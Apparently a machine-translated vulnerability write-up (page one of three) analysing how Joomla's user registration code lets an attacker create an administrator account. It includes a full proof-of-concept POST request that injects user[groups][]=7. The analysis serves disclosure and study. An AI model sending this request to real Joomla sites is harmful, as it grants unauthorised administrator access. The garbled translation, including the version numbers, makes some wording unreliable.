joomla create a privileged user exploit analysis(cve-2016-8869)-vulnerability warning-the black bar safety net

2016-12-01T00:00:00
ID MYHACK58:62201681701
Type myhack58
Reporter 佚名
Modified 2016-12-01T00:00:00

Description

Vulnerability environment

Joomla version 3. 44 to 3. 63

Vulnerability description

This vulnerability and CVE-2016-8869 is a companion piece to the vulnerability, but this vulnerability than 8869 this vulnerability, the ideas more ingenious, more interesting. This vulnerability nature is also associated with 8869 of this vulnerability almost, are to appear in the user login registration place.

Vulnerability analysis

The entire vulnerability or and before the 8869 vulnerabilities similar, are out in the components/com_users/controllers/user. php UsersControllerUser::register ().

Request packet

First, by a request packet to analyze UsersControllerUser::register()of the entire registration process of the processing.

|

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

|

POST /joomla/index. php/component/users/? task=registration. register HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: EN-us,EN;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/joomla/index.php/component/users/?view=registration Cookies: 【COOKIE】 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------596020006637 Content-Length: 1036

-----------------------------596020006637 Content-Disposition: form-data; name="user[name]"

spoock -----------------------------596020006637 Content-Disposition: form-data; name="user[username]"

spoock -----------------------------596020006637 Content-Disposition: form-data; name="user[password1]"

123456 -----------------------------596020006637 Content-Disposition: form-data; name="user[password2]"

123456 -----------------------------596020006637 Content-Disposition: form-data; name="user[email1]"

1@123.com -----------------------------596020006637 Content-Disposition: form-data; name="user[email2]"

1@123.com -----------------------------596020006637 Content-Disposition: form-data; name="option"

com_users -----------------------------596020006637 Content-Disposition: form-data; name="task"

user. register -----------------------------596020006637 Content-Disposition: form-data; name=【TOKEN】

1 -----------------------------596020006637--

---|---

The use of【】the label of the COOKIE and the TOKEN requires the user to self-define, as to how to get these two values, the entire above article has done a very detailed description, here is not explained.

register()

The above POST request will be made of components/com_users/controllers/user. php UsersControllerUser::register()to be processed. ! [](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/1.png) The program will run to$model->register($data). Where$data is the POST data in the user array.

register($temp)

Tracking$model->regsiter($data)method components/com_users/models/registration. in php UsersModelRegistration::register($temp) ! [](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/2.png) In to$temp for foreach traversal before, the presence of the statement

1

|

$data = (array) $this->getData();

---|---

This will be a$data variable in via the$temp to$data values to be assigned before the$data is already present the content, but also identifies the user type of the data. ! [](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/3.png) As shown above, wherein the groups of the array value of 2, identifies this user as an ordinary user.

Successful registration

At the completion of the entire process, you will register an ordinary user. ! [](http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/4.png)

PoC

In the know is to use the groups array for the user is identified, then it can be directly in the POST Data added to the groups array, the value is set to Administrator, the value(in joomla to 7), then you can create an administrator user.

POST data

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 1718 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54

|

POST /joomla/index. php/component/users/? task=registration. register HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: EN-us,EN;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/joomla/index.php/component/users/?view=registration Cookies: 【COOKIE】 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------596020006637 Content-Length: 1125

-----------------------------596020006637 Content-Disposition: form-data; name="user[name]"

spoock -----------------------------596020006637 Content-Disposition: form-data; name="user[username]"

spoock -----------------------------596020006637 Content-Disposition: form-data; name="user[password1]"

123456 -----------------------------596020006637 Content-Disposition: form-data; name="user[password2]"

123456 -----------------------------596020006637 Content-Disposition: form-data; name="user[email1]"

1@123.com -----------------------------596020006637 Content-Disposition: form-data; name="user[email2]"

1@123.com -----------------------------596020006637 Content-Disposition: form-data; name="user[groups][]"

7 -----------------------------596020006637 Content-Disposition: form-data; name="option"

com_users -----------------------------596020006637 Content-Disposition: form-data; name="task"

user. register -----------------------------596020006637 Content-Disposition: form-data; name=【TOKEN】

1 -----------------------------596020006637--

---|---

[1] [2] [3] next